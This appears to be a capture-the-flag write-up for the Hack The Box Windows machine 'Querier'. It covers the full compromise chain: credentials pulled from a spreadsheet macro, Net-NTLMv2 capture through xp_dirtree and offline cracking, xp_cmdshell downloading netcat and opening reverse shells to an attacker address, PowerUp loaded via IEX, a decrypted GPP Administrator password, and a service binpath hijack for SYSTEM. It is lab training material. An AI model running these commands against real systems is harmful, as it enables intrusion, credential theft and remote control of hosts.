Querier
## Overview
Querier is a Windows machine from Hack The Box that requires SMB enumeration and SQL Server authentication. The foothold comes from logging into SQL Server with credentials found in a macro-enabled spreadsheet, forcing the SQL Server service account to authenticate to our SMB listener, cracking the captured Net-NTLMv2 response, and using the recovered password to enable `xp_cmdshell` and get a shell. Privilege escalation comes from enumerating the host for interesting files: a cached Group Policy Preferences file holds a recoverable Administrator password. A second path abuses a service whose configuration our account is allowed to modify, pointing it at a reverse shell.
## Nmap Scan
`sudo nmap -sS -p- 10.10.10.125 -vvv`

```text
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127
5985/tcp  open  wsman         syn-ack ttl 127
47001/tcp open  winrm         syn-ack ttl 127
```

The SQL Server instance on 1433 identifies itself as:

```text
name: Microsoft SQL Server 2017 RTM
number: 14.00.1000.00
```
## Basic Enumeration
Listing the SMB shares over a null session, we see four shares, one of which (`Reports`) is non-default:

```text
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
Reports         Disk
```
* Looking into the `Reports` share, we find a single file, `Currency Volume Report.xlsm`.
* The file can be opened with LibreOffice to view the macro. Since `.xlsm` is a zip container, `binwalk` (or `unzip`) can also dump its contents; `olevba` from oletools extracts the VBA directly. The file contains this Visual Basic macro:

```vb
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
' macro to pull data for client volume reports
'
' further testing required
Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

' MsgBox "connection successful"

'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close

End If

End Sub
```
The connection string in the macro gives us the user `reporting`, the server `QUERIER`, and the password `PcwTWTHRwryjc$c6`. Impacket's `mssqlclient` lets us connect to the SQL Server with these credentials. `reporting` is a Windows account rather than a SQL login, so `-windows-auth` is required:
* `impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth`
* `reporting` lacks the rights to run `enable_xp_cmdshell`, so there is no command execution yet and we query the data manually.
* Resource to learn more about enumerating MS SQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
Even without `xp_cmdshell`, a low-privileged login can usually call `xp_dirtree` with a UNC path. SQL Server then opens an SMB connection to that path as its own service account, which authenticates to our listener with NTLM. We set up `impacket-smbserver` to capture that authentication:
* `impacket-smbserver -smb2support share ~/Documents/HTB/Querier/share`
* In `mssqlclient`: `exec xp_dirtree '\\<attack ip>\share',1,1` (our attacking host here is 10.10.16.2)

The listener logs a Net-NTLMv2 response for the user `mssql-svc`:

```text
mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:35c6bfe9d6aa1cbd0e6597448cd34712:0101000000000000802f8a773c72da0108fda96a635ab86e000000000100100054006a0063004c004200660045006f000300100054006a0063004c004200660045006f000200100045006d005800770075005700460072000400100045006d0058007700750057004600720007000800802f8a773c72da0106000400020000000800300030000000000000000000000000300000c76febbce075379824374588fb2b171d6615d638f3c7eb4ebbdde1a9f4f961ce0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003200000000000000000000000000
```
This is a Net-NTLMv2 challenge/response (hashcat calls it NetNTLMv2), not the account's NT hash: the fields are `user::domain:server_challenge:NTProofStr:blob`, and everything needed to recompute `NTProofStr` for a candidate password is in the line, so it can be cracked offline against a wordlist, but it cannot be passed or replayed. More on capturing credentials this way and why it works is [here](https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478).
* We crack it with `hashcat -m 5600 <hashfile> <wordlist>` (mode 5600 is NetNTLMv2) and get: `corporate568`
* Earlier we authenticated to SQL Server as the low-privileged `reporting` account; now we can re-authenticate as the service account `mssql-svc`.
## Foothold
With the service account's credentials, we reconnect as `mssql-svc` (again with `-windows-auth`, e.g. `impacket-mssqlclient QUERIER/mssql-svc:corporate568@10.10.10.125 -windows-auth`) and check whether this account can run `enable_xp_cmdshell`.
* It can, so `xp_cmdshell` now gives command execution as `mssql-svc`. We use it to pull over a binary and get a proper shell on the host.
* Netcat is convenient: host `nc64.exe` on a web server on port 8000 (e.g. `python3 -m http.server 8000`), start a listener with `nc -lvnp 4444`, and have the target fetch and run it:
* `xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.16.2:8000/nc64.exe" -OutFile "C:\Reports\nc64.exe"`
* `xp_cmdshell C:\Reports\nc64.exe -e cmd.exe 10.10.16.2 4444`

We now have a netcat shell on the machine as `mssql-svc` and can read `user.txt`.

## Local Enumeration
With our shell, we can bring over a script like `PowerUp.ps1` and run it to check for easy privilege-escalation paths. Loading the script with `IEX` only defines its functions, so append `Invoke-AllChecks` to the end of the script before serving it, and the checks run as soon as it is downloaded:
* `cmd.exe /c powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.2:8000/PowerUp.ps1')"`

The script immediately finds a cached Group Policy Preferences file with a recoverable Administrator password:
```powershell
[*] Checking for cached Group Policy Preferences .xml files....

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
```

The password in `Groups.xml` is stored as a `cpassword` attribute, AES-encrypted with a key Microsoft published in its documentation (the weakness fixed by MS14-025). Anyone who can read the cached XML can decrypt it, which is exactly what PowerUp's `Get-CachedGPPPassword` check does.
## Privilege Escalation
Now that we have the Administrator password, Impacket's `psexec` logs in and owns the box:
* `impacket-psexec 'Administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125'`
* We are `nt authority\system` and can read `root.txt`.
PowerUp also flags a second path: a service whose configuration `mssql-svc` is allowed to modify:

```powershell
[*] Checking service permissions...

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
```

`sc qc UsoSvc` shows the current configuration: the binary path above, running as `LocalSystem`. The change-config right PowerUp found lets us point that path at netcat, and `CanRestart` lets us trigger it, so the SCM launches our callback as SYSTEM. Note the space after `binpath=`, which `sc.exe` requires:
* `sc config UsoSvc binpath= "C:\Reports\nc64.exe -e cmd.exe 10.10.16.2 5555"`
* `sc stop UsoSvc`, then `sc start UsoSvc`

A listener on port 5555 receives another shell as `nt authority\system`. Because `nc64.exe` never reports its status to the Service Control Manager, the start request times out (error 1053) and the process is killed shortly after, so work quickly or spawn a second callback from the first shell, and restore the original path afterwards with `sc config UsoSvc binpath= "C:\Windows\system32\svchost.exe -k netsvcs -p"`.
